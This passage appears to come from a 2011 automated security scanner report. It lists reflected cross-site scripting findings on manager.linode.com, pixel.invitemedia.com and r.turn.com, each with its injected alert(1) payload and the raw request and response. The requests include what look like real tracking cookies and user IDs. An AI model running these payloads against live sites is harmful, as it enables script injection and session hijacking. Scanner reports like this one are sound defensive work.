Nlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 16:02:28 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 20 Jul 2011 16:02:28 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:28 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "C07583405EA<SCRIPT>ALERT(1)</SCRIPT>C1EDA980F6D" was not recognized.
*/

4.109. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21 was submitted in the REST URL parameter 3. This input was echoed as f3fdf"><img src=a onerror=alert(1)>5eef32d9c21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2701

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/f3fdf"><img src=a onerror=alert(1)>5eef32d9c21=N onerror=netsparker(9)>
...[SNIP]...

4.110. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58 was submitted in the REST URL parameter 3. This input was echoed as 675ff><img src=a onerror=alert(1)>299ae41ef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/%22%3E%3CiMg%20src675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2710

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<iMg src675ff><img src=a onerror=alert(1)>299ae41ef58=N onerror=netsparker(9)>
...[SNIP]...

4.111. https://manager.linode.com/session/forgot_save/N [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://manager.linode.com
Path:	/session/forgot_save/N

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 was submitted in the REST URL parameter 3. This input was echoed as 3fb26"><img src=a onerror=alert(1)>12901bad508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/N3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
Referer: https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2677

<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/N3fb26"><img src=a onerror=alert(1)>12901bad508" method="post" onsubmit="return _CF_checkforgot_save(this)">
...[SNIP]...

4.112. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.invitemedia.com
Path:	/admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a30'%3balert(1)//7d4e8305cf was submitted in the admeld_callback parameter. This input was echoed as 95a30';alert(1)//7d4e8305cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /admeld_sync?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match95a30'%3balert(1)//7d4e8305cf HTTP/1.1
Host: pixel.invitemedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=2ecd6c1e-5306-444b-942d-9108b17fd086; subID="{}"; impressions="{\"580192\": [1308590348+ \"162762637887060014\"+ 29710+ 11561+ 12332]}"; camp_freq_p1="eJzjkuH4vZBVgFGip+nfexYFRo2epc0fWAwYLcB8AJyQC1E="; exchange_uid="eyIyIjogWyI3MjEyMjgyNzE3ODA4MzkwMjAwIiwgNzM0MzIxXSwgIjQiOiBbIkUwIiwgNzM0MzA4XX0="; io_freq_p1="eJzjEua4ECrAKNHT9O89iwGjBZgGAEeuB9s="; segments_p1="eJzjYuFYs4uJi5ljcSKQ+McBJKYqAYnnuVycHPejBY40HfvIwsXCMesQMwDhcQvD"; partnerUID="eyIxMTUiOiBbIjRlMDcxMmFjNjIyYzY0NjEiLCB0cnVlXSwgIjE5OSI6IFsiNUY0MTJDQzZCQTA4RkQ2N0FBNENDNzVBMDA1N0RBMjUiLCB0cnVlXSwgIjE5MSI6IFsiNzM1MjgyMTM0NDMwMDgwMTA4MSIsIHRydWVdLCAiMTUiOiBbIjAwMzAwMTAwMTk4MDAwMDg4NTg1OSIsIHRydWVdfQ=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 19-Jul-2011 20:42:46 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 284

document.write('<img width="0" height="0" src="http://tag.admeld.com/match95a30';alert(1)//7d4e8305cf?admeld_adprovider_id=300&external_user_id=2ecd6c1e-5306-444b-942d-9108b17fd086&Expiration=1311540186&custom_user_segments=%2C12451%2C14055%2C40236%2C4373%2C57626%2C1150%2C11743"/>
...[SNIP]...

4.113. http://r.turn.com/server/pixel.htm [fpid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 119bc"><script>alert(1)</script>62e3c2f614 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=119bc"><script>alert(1)</script>62e3c2f614&sp=y&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dOXvmlUYvchAIC41YWsfzjzp7j673BFOwj7kd5piN4nwT09t9QUFieuPTlYTYuLxN5WATvM0mK-KDbn0ZCRSDWw6VHcJi1VLZK71p2IH5G3kf_oBhwjTOnNMzLRnNQb5gQDdHCGVILQ_GSkt8jIcTv-4EXfFGgUhYxl9K8gA6q2fVPJKYMLenkR53_z7-7qD7Bhb0de3mz-u8OigGHus6lq8YqB9rag0m6x7v-6jxP7SoPWxLgwiKvYZdQW-_RL07jyp0KuHGXlNga1wgAKVUFU49Pwhd7loRStsS3dnwF_O7BA70nmZ9huNYruXOAA8ET2U8OOU9RrKIRMlaXVx3dOgC2rG0F4hrpo6NUTpDKGdGTg4F9Rl9wNcACy4XbPZTbpYuE4Dq368Sg_UiNjuOsP8vWKVE9fehI1gPZO5pxrAQeVZGg-wIZkbGkclq5RdnAUwoPSxvJ8BCKL8c227GvAPDk68AwPooBVnTHzx-zk3BzWEd-pH3IdKaEgaOIZCCl5ZiPU29H319cqixiPn-pwXdsFy2HQYJ9afeYTnFMtpkEw27lGfK23pq1Aumgf2vcGrs7cXuZiZgFiIa18-IAx8KvJar-j63j-oi0PwOaSKex4EWpR3nASqE_HAAzgcjUeD4otZDQobYTgeTOS1rQfFvcOgFtifXC4-sxdOYEcCW_dsQ_GxHZf7_C9Rdjj7D8FsOM2z6P2KvGnoosdNvtgm3hny8YL0UyMuKN8TOUFRENR76gCh00Zu_v56iMiwzmpPH34AXuKovB3TKU4sIoqbFpybTV96X4YNbFXe9HDBrGGTDDj3IewhYn5Jy6cOSQPzQiBy5eFVH9N6AHGxCHLg3OEIP65yOuneU2THS_sRn7ADdO-4XWXCJTGG1V-KE6aYeVzN2AFcUjiba83-HD2NgibLaNsuOrsqmRk15T3FIy6RYGjw5ujxgP2dw8IZyLRLGUK_tgdfhadIzcIY_BXXKEzZKEO0NM1Ei1NE2ftA-3JCuRqA5Xi4SZFb6GS2TJMoGZ3hsvTbtPyEjTn8nWELPl1sEbJhVv6P-J95rAoH3fuI-HGZbYXMU3133KhE2qoT9AMLNU18sJKtxu8BXxLsdcEU2zWU9E-Y4DkT-x03Qq8Jlq6cBCGP4Q8xWRQ4gj64NcMhc0tzll5ZRASQyIkauMP0jGeDOcQ_kDie1nv8hQPwIyPyKom0QdO2EOTpmd-0Cg8JHxzOgfL1-7Vrv-BM6-Ipu0YfMWj2PjCVytilaZ8JGajjoZ6_iD0kfD7kn--V84pp6S0KFA0wYFHOMhzRklI7Zf9h5qkCrNMlQT8wHdJkNxJrkgadu0_VlGjmgZaUhihf9dSs0Xwa5GFkfeXs9fU6PsiWYUbVG5lf90B2ggqpYAn5SWLuIsHOMBlTCwL0LnzlWXLJZOL45hdjL0BQWbyPb7s77eCWCdAu4gW26YOEpDbcBo0JqPrc2OxKq91pi574VYt6WibU4dGj5jJ3oaTYEjh9xpVCw5MH80onNdN68NqxDeNmnkOd4hHuqONPAcUfbmswfIykg5y75; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15174%7C15174%7C15174%7C15170%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7C15174%7C15174%7C15174%7C15174%7C15174%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15174; rv=1; adImpCount=XEl9-VrK61OYlDDbq0pGGxK9qDj9N8Yq-RC8L7M3u-b8WrdFCUa-62hysSsfECsztx3u53x713hOGdHs2hH4A54eRIbZxuCuOfEny5g4Q5vvyaMrZETwI6pLNg-8lHcwBx5j9SG9QaMmEO6nXCjUeAr8NHZqbwRfVf_7-29ZQ3dPUL1xC6vykF_wcZeiKpIDKLchE-lw9J3csr8W1qBvLKBDigDSWV-4PwxnK6BJYJ6a83X2-8gHfiZIB9yO_48CSr7DTFA1kspm4vyZz7f-oFKd1JO_8TeGfYCaP6T3mJ4nX_UyDjQuDeV0J4DxLzIImntR_7AizpE5l54qzLMxm_6hHFZ0zNTsQxcRcycfR4tb7kg2TIufO8aOmyJKxT9twngY6WXHxR32jX1daK2bVP4NfeugtrNT-H12aSBn58lYl1fS6f9VhImQOf7kzHx87ahUpcK77Ne2qQ14vbDAVuHJ7_QMGopCUKqjTPBwJfEshr9PCYO_Pb6mVf99dGqKhGsiuBXhui5dXF29duXiFLgvAmcHKK8sCB-scI9PFtZAFew1GN7UMtgNNXxIBDGXlXuOehU5wN-RBJLiWUhgGxdZlFQfkFxGhEj7DFsCIwygmLKPUl1-DSslp_jNTeEnV5sxtRpIhNFr3R4y_IbA-uMn3DJnYbuv9fB4hgflp0IXloVtNGskTE7e3pCLr9JPtq0e-Yxil5WqDNp_Xa19VpRLdmUPzQMXTGSe2mVd-mn9LwNxDUajJ0qWfPyFisaMughPUixDVERsvPoCHHfeKQrrmfCWAcYAvCODSfTx_dt6XlyPQicl36vbwbMHKmNPdxGORK015zAMTrgRK3tzOZoFHUXb2yfg6pqH2PZcFI9k8TiCteNp6LftFs52NVT1mBI4bk12UST-LnFUowS3-RvhxTFhYtQAjmMzQGuqCoHDbFDilhrLRCGCzM6wfEY1il9fyAhhdhiX5xeErwkXNyHIaOUw0k7rEWVmhg_B3BvZ_JJ1eKyIzbgt_46WlYWQgL9ZasOD_xa3su2SzMNRN2SuA9MLS8vgRbxcjF4D-VasQd-K3D1zUp50dqChmHX6C4xm9J2ryFuX1DzhXXsB8ylVhDHg-IslHHEfTEZTSA4x79w-7fs-jv4a_nay_HqcrQ8aehmYh5Jg6VXvy35gzzP6XJ_yuUArG_onsuv3vvL9MhSKhfx_0dtVyabDgbCqa6wnc6gCdYyI1-sfJpI-QBdXR0uqmDD2eYvdS9m5DXv2uz4Zb-DPt4U0OzYsfARGt8T0lbTEs5R2ssJBAXf4RzRmJLWAXWGZ7y350hPxEYbj56fbCkLTUP4e4LG-eGTJPXN0PsrITSU8C4fiFQveo7e0JuwiiBRFBNfg8FsAuVjlEcR3t9O1geSdCpLtOklDs1_dGncbBBZQER_-paQCLIkAt3Jl7cqev_X29x1h3RSVLhbvuiUEQMd1lhXf8GDmZ0Jnx2XlDSkvkmayIRlhMWfGUifX2zWUC3ltenVJv3APnigAxJ-NYybTcJEqynuxehNV1hiWOz68umgc0zIpIVjfhKS00ZzgKSyqxNn0CdXhyaotnSsGTyNwM6ZkvI_Z10U3MfELlNkmX_XPVOU0HrhNcMsSZcik8nkd49q2eNubEURCOAjIGdoxoenAt7h7IGR2M1Z1ErhKEgsUCD2hSTIUnlH_y9NqV6g7b8e07lQA1Uh8Kq3I9sxtE4bsf-D-_nx6vDTYFdjN9w06yUer67up1KhChubA5U8BJRHU7-8bdiAU5MZxUpTEkY01NGw92liBW3paDMImJKv-PTnj78C4Uzb6zF-7vU0IBAq0Nxz6oPyeu_-tlKn4wWcc1wS0BZpUrw-_JSZnVwJkpXq8ku1YJPyJs89AI-TQjOdmv_wF3yJfWo_bhgMidGdvKsEerMw_HAA_XvCa5t1ee8A8vU9soulitrQn0XilGeOl6DjUev-tK4mWDrtJp1H73ByXN3oz5PKxU1cGfc2vPHWGNNTNsd2AtHF-A_WbAOrW2okW62_imER21-Q6lk_i6e_aWY_5C8-p6ey3Fr6swBOuIBQDVITq1YTb72FJL6I4U2ltklVfhSes07iSkkal24UryHg-2ytWanyb82T2QednMHYl4wuDCc_sYs_dex6U9CJP5_90kTMsahQIAN6uq-K1m21UcyUMLvjIshMBfZQlVNcEG6K13w3b1aVS5l4sXzJE0lMAJuiEAG3g-bWk-Mf1KEz5IgS4ObpyJaRLJM8dnU1Nhl4Gj4DbtR0q02VwtV6eFe3CztMFbpkbIC8QRi-0-t0Q0lWju26SjBcFQ0SU-Q9PM_H4NT6AI8v_boZ3SdVlbIcVdR0yZ4wedowaV7UdLSZT7Vd3BZ1KiY9UBdA5uI2cB84BCr7aSv_WzT6Y4rLfuC2S9rqcVQFVrB7RXcS8ct0eawHscfZtg6DjU2kd4mzjdZAZ1N-YY92z2OVeSZ2FL5fR9kiNgijvfD-uQGvZt18MNEuRd6-og7BHQ4MLjuFAxUjCRGcr4Wz1bF_gp-HqZlvshuxvLJX9Q1uaghvWvoDX2h3Tna6Tq_5FNrC8eFEaOBiixj5GMpqN1mMqzZCd2dYo2uIBroHY1sBGoqGendnWKNriAa6B2NbARqKhnsm1CmKqgKyOK13X-vu4sXaZhAZ7dALNrlk2ZHupjzbZY4Skgdl7-1xlrgatqP0BPkDy2gYn1fKV06W2G3H81OxfZr29Puen9VV4NGp4BUq5TwT_el8ARa0B5bXFDez7TjQPThcXUuLZr2wajJbtGXgfM7CBtk-9mAyKLE0-tkghfsQnFe8RDolHxo4SRL9-K1XKoo8vmE9KuX6fSQjzEzjIjx8ScH5O8C3okRouLhhDy36dawlh2vAyUu-Jy2pQNQ; fc=ZUZU62WSV7nfkj5OuUXlEuTbw71SxSIM1JZ50RraV4iJlDq2d88xQrqQkmk8VI-DV4N7x_k-SjlCpIAKcw_aSFfb3vCZSK3GVbftks7IMxvi3Sy-PEwXW67DoFr3mtCG

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3698952182471149434; Domain=.turn.com; Expires=Sun, 15-Jan-2012 20:43:07 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 20:43:06 GMT
Content-Length: 383

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=3698952182471149434&rnd=2415557707156706131&fpid=119bc"><script>alert(1)</script>62e3c2f614&nu=n&t=&sp=y&purl=&ctid=1"
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

4.114. http://r.turn.com/server/pixel.htm [sp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.turn.com
Path:	/server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe90d"><script>alert(1)</script>7ca5f466ef2 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=fe90d"><script>alert(1)</script>7ca5f466ef2&admeld_call_type=iframe&admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: uid=3698952182471149434; pf=NDcX_zsBYGyedNXi3qMeklhJgDGRxsXL4nW-oSsu0v4AEd86v8h-PzhBRGtnAlRoz7MisnmDFDgyz0hA-2hwGyILCp316Absefd-fOvjhPhg4UsKxkd8UrM-8lcTaKyN2AjFtC80xvceGkEagrzXtBy-hX0_bBlCBt6ko5LbbGAkcmhxzSMUhyXEP1EMjVkExFUZO7_uH6uqU4TVbggO2jOScYXtrCyOtL5YGiDkh7hlk4bn-xPus8sWRzOogb2Ko6Ub-B5c11CGsJOSV6yl-VfR8cF6SPURe375GKp6bYSvaJGEcqOdIV0vwOWTLXbdMDIYID7ZwLblauWBO9dJ6djnmhRBcG78MMT2WTVsK7GKj_ObR_Lgx_f0fxn2B7QZTJgyl8xxj8sxT5XM_Pf04XQM_4vlij299-XhdmIT0lN7qezjJvpc_gGfeIy2ln9Q4O9SnyVtHz0AqUEUa2_xEzEj9SmZFZgxYPAZZU1ReJp9wr5pB9rWFBEAxIcaY_g8-enRWV78rsMGaGUivi6txG3sf48mMdMLZxguOO8FgLKy2FfDvGXCH6BefHT69H4ZzJO6hwDgE92WLdnoaYk7XdHci1lLBuj9A_ddHFEbOVmcKKgDh4XSrcl6inkLAhP12aIpwdzJxDyaFwhffSWAzkALzBcTrhfbzmMmjcKyLmBoAvId_IxJwwaMThURtDF7AZK2RzFrpw2XtDGikuUzcg5PvlThFWtQbXc8YTkhwO7it5BsUipuSlNDjCxLSzZozBJAvpZBaSiDlykcP08AmgMsEWc4vSYgRQcaCdeV2p9dO